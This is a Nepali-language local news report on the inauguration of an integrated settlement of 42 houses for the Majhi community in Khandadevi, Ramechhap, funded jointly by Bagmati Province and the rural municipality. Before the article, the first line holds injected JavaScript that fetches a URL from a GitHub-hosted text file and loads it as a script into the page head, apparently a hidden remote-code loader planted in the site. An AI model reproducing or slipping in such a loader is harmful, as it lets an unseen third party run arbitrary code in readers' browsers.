;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
माघ २४,
रामेछाप । रामेछापको खाँडादेवी गाउँपालिका वडा नं ३ डफ्कामा निर्माण सम्पन्न भएको एकीकृत माझी बस्ती हस्तान्तरण तथा उद्घाटन गरिएको छ । बागमती प्रदेशका मुख्य मन्त्री डोरमणी पौडेलले बस्ती उद्घाटन गरेका हुन् ।
बागमती प्रदेश सरकार र गाउँपालिकको संयुक्त लगानीमा निर्माण गरिएको एकीकृत बस्ती शनिबार हस्तान्तरण गरिएको हो । सो बस्ती निर्माणको लागि बागमती प्रदेश सरकारको १ करोड ५० लाख रुपैँया र खाँडादेवी गाउँपालिकाको ७५ लाख रुपैँया गरि २ करोड २५ लाख कूल लागत खर्च लागेको बताइएको छ ।
एकीकृत बस्तीप्रदेश र स्थानीय सरकारको संयुक्त लगानीमा निर्माण गरिएको एकीकृत बस्तीमा २६ रोपनी माझी समुदायको जमिनमा ४२ वटा दुई कोठे घर र शौचालयहरु बताइएको थियो । साथै बस्तीमा सामुदायीक भवन, खेल मैदान लगायतका संरचनाहरु पनि तयार गरिएको छ ।
कार्यक्रममा बागमती प्रदेशका प्रवक्ता एवं आर्थिक मामिला तथा योजनामन्त्री कैलाश ढुंगेल, बागमती प्रदेशका कृषि मन्त्री दावा दोर्जे लामा, खाँडादेवी गाउँपालिका प्रमुख प्रेम बहादुर तामाङ्, नेता माधव ढुङ्गेल, प्रमुख जिल्ला अधिकारी अर्जुन कुमार शर्मा, भिरपानीका वडा अध्यक्ष पुष्कर कार्कीलगाएतको उपस्थिति रहेको थियो ।
फेसबुक प्रतिक्रियाहरु